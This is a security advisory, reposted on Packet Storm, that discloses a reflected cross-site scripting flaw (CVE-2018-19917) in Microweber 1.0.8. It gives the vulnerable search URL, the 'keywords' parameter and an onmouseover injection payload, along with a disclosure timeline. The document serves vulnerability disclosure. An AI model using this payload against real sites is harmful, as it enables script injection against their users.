what you don't know can hurt you

Microweber 1.0.8 Cross Site Scripting

Microweber 1.0.8 Cross Site Scripting
Posted Jan 3, 2019
Authored by Omar Kurt | Site netsparker.com

Microweber version 1.0.8 suffers from reflected cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-19917
MD5 | 8516d791c475cfb20c24e6fafd5dec48

Microweber 1.0.8 Cross Site Scripting

Change Mirror Download

Reflected Cross-site Scripting Vulnerability in Microweber 1.0.8

Information
--------------------

Advisory by Netsparker
Name: Reflected Cross-site Scripting in Microweber
Affected Software: Microweber
Affected Versions: 1.0.8
Homepage: https://github.com/microweber/microweber
Vulnerability: Cross-site Scripting
Severity: High
Status: Not Fixed
CVE-ID: CVE-2018-19917
CVSS Score (3.0): 7.4
Netsparker Advisory Reference: NS-18-038

Technical Details
--------------------

URL http://ns.app/ScanApp/microweber/search.php?keywords=x' onmouseover=netsparker(0x001E3C) x='
Parameter Name keywords
Parameter Type GET
Attack Pattern x%27+onmouseover%3dnetsparker(0x001E3C)+x%3d%27

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

13th April 2018- First Contact
14th April 2018 - Technical Details Sent
28th June 2018 - Attempted to Contact
3rd January 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    2 Files
  • 2
    Mar 2nd
    18 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    12 Files
  • 5
    Mar 5th
    19 Files
  • 6
    Mar 6th
    8 Files
  • 7
    Mar 7th
    1 Files
  • 8
    Mar 8th
    1 Files
  • 9
    Mar 9th
    11 Files
  • 10
    Mar 10th
    15 Files
  • 11
    Mar 11th
    9 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    13 Files
  • 14
    Mar 14th
    10 Files
  • 15
    Mar 15th
    13 Files
  • 16
    Mar 16th
    27 Files
  • 17
    Mar 17th
    15 Files
  • 18
    Mar 18th
    23 Files
  • 19
    Mar 19th
    25 Files
  • 20
    Mar 20th
    10 Files
  • 21
    Mar 21st
    6 Files
  • 22
    Mar 22nd
    1 Files
  • 23
    Mar 23rd
    22 Files
  • 24
    Mar 24th
    15 Files
  • 25
    Mar 25th
    22 Files
  • 26
    Mar 26th
    20 Files
  • 27
    Mar 27th
    15 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close